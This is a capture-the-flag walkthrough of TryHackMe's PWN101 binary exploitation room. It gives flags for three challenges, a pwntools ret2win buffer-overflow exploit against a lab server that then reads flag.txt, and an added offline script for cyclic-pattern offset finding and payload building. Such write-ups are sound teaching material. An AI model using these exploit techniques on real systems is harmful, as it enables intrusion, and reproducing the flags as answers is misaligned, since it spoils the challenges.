![[PWN101] - TryHackMe - Walkthrough](https://www.grayhatfreelancing.com/media/posts/55/pwn101-tryhackme-walkthrough.png)
[PWN101] - TryHackMe - Walkthrough
Using Pwntools to Pwn the [Pwn101] Room on TryHackMe
https://docs.pwntools.com/en/stable/
https://gef.readthedocs.io/en/master/
Real quick, I have to say that I don't have idols. I don't like the idea of idols. But Hugsy and Fyodor (nmap) are both idols of mine. I try to look up to them for inspiration, keeping in mind that I should look at what they were doing when they were at my experience level, so their skill set doesn't seem impossibly unobtainable.
[Pwn101] - TryHackMe
Beginner level binary exploitation challenges.
Challenge 1 - pwn101
We're always going to start off by marking these binaries executable and basically running them. I'm not going to run a malware scan, because I'm in a dedicated environment. But, even in this situation, that's dumb of me. You should run a malware scan of any suspicious binary.
pwn101.pwn101
![[Pwn101] - TryHackMe - Walkthrough](https://www.grayhatfreelancing.com/media/posts/55/pwn101-tryhackme-walkthrough-01.png)
Ok... it drops a shell, and the challenge is on port 9001... And, yes, some things are just this easy. Haha
![[Pwn101] - TryHackMe - Walkthrough](https://www.grayhatfreelancing.com/media/posts/55/pwn101-tryhackme-walkthrough-02.png)
THM{7h4t's_4n_3zy_oveRflowwwww}
Challenge 2 - pwn102

THM{y3s_1_n33D_C0ff33_to_C0d3_<3}
Challenge 3 - pwn103
Initial exploit:
![[Pwn103] - TryHackMe - Walkthrough](https://www.grayhatfreelancing.com/media/posts/55/pwn101-tryhackme-walkthrough-06.png)
Weaponize it for the server:
#!/usr/bin/env python3
from pwn import *

# Connect to the remote pwn103 instance (address and port from the room)
p = remote("10.10.200.187", 9003)

# 40 bytes of filler reach the saved return address, which is then
# overwritten with 0x401554 (placed twice, as in the local exploit above)
payload = b"A" * 40 + p64(0x00401554) + p64(0x00401554)

p.sendline(b"3")      # menu choice used in the walkthrough
p.recv()
p.sendline(payload)   # trigger the overflow
p.recv()

# On Python 3, pwntools wants bytes, not str, for data sent to the process
p.sendline(b"whoami")
p.sendline(b"id")
p.sendline(b"cat flag.txt")
p.interactive()

THM{w3lC0m3_4Dm1N}
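The two things the pwn103 script relies on, the 40-byte offset to the saved return address and the `A*40 + p64(addr) + p64(addr)` layout, can be reproduced offline without pwntools. The following is an added example, not code from the walkthrough or from pwntools: it implements a cyclic pattern in the style of `cyclic()`/`cyclic_find()` (the standard FKM De Bruijn algorithm, so every 4-byte window is unique), simulates a crash where the word at the return slot comes from the pattern, recovers the offset, and then builds and decodes the payload so its layout can be checked before anything is sent. The offset 40 and the address 0x401554 are taken from the page; the "crash" is constructed, not a real run.

```python
#!/usr/bin/env python3
"""Added example, not part of the original walkthrough and not pwntools code.

Reproduces offline, with the standard library only, the two steps behind the
pwn103 payload: locating the offset to the saved return address with a cyclic
pattern, and packing / unpacking the ret2win payload itself.
"""
import struct

# Values copied from the walkthrough's payload: 40 bytes of padding and the
# address 0x401554 placed twice on the stack.
OFFSET = 40
WIN_ADDR = 0x00401554


def p64(value: int) -> bytes:
    """Little-endian 64-bit pack, the layout pwntools' p64() gives on amd64."""
    return struct.pack("<Q", value)


def u64(data: bytes) -> int:
    """Inverse of p64()."""
    return struct.unpack("<Q", data)[0]


def cyclic(length: int, alphabet: bytes = b"abcdefghijklmnopqrstuvwxyz", n: int = 4) -> bytes:
    """Return `length` bytes of a De Bruijn sequence over `alphabet`: every
    n-byte window is unique, so any 4 bytes that land on the stack or in a
    register after a crash identify exactly where they came from (same idea
    as pwntools' cyclic(), implemented here with the FKM algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    out = bytearray()
    for byte in db(1, 1):
        out.append(byte)
        if len(out) == length:
            break
    return bytes(out)


def cyclic_find(subseq: bytes, max_length: int = 4096, n: int = 4) -> int:
    """Offset of `subseq` within the cyclic pattern, or -1 if it is not there.
    Only the first n bytes matter, since n-byte windows are already unique."""
    return cyclic(max_length, n=n).find(subseq[:n])


def offset_from_crash_word(word: int) -> int:
    """Given the 8-byte value that overwrote the saved return address (what a
    debugger such as gef shows at $rsp when the process faults on `ret`),
    recover how many bytes of input preceded it."""
    return cyclic_find(p64(word))


def build_payload(offset: int, addrs: list, filler: bytes = b"A") -> bytes:
    """`offset` bytes of filler followed by each address packed with p64()."""
    return filler * offset + b"".join(p64(a) for a in addrs)


def decode_payload(payload: bytes, offset: int) -> list:
    """Split the bytes after the padding back into 8-byte words, so a payload
    can be inspected before it is sent."""
    tail = payload[offset:]
    if len(tail) % 8:
        raise ValueError("data after the padding is not whole 8-byte words")
    return [u64(tail[i:i + 8]) for i in range(0, len(tail), 8)]


if __name__ == "__main__":
    # Constructed crash: pretend the program copied cyclic(100) into its
    # buffer and faulted; the word at the return slot is pattern[40:48].
    pattern = cyclic(100)
    crashed_word = u64(pattern[OFFSET:OFFSET + 8])
    print("recovered offset:", offset_from_crash_word(crashed_word))

    payload = build_payload(OFFSET, [WIN_ADDR, WIN_ADDR])
    print("payload length:", len(payload))
    print("words after padding:", [hex(w) for w in decode_payload(payload, OFFSET)])
```

Running the script prints a recovered offset of 40 and a 56-byte payload whose two trailing words decode back to 0x401554, which is exactly the layout the remote script sends; `decode_payload` is the check worth running on any hand-built payload, since an off-by-one in the padding shifts every address by a byte.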
Challenge 4 - pwn104 (nop sled)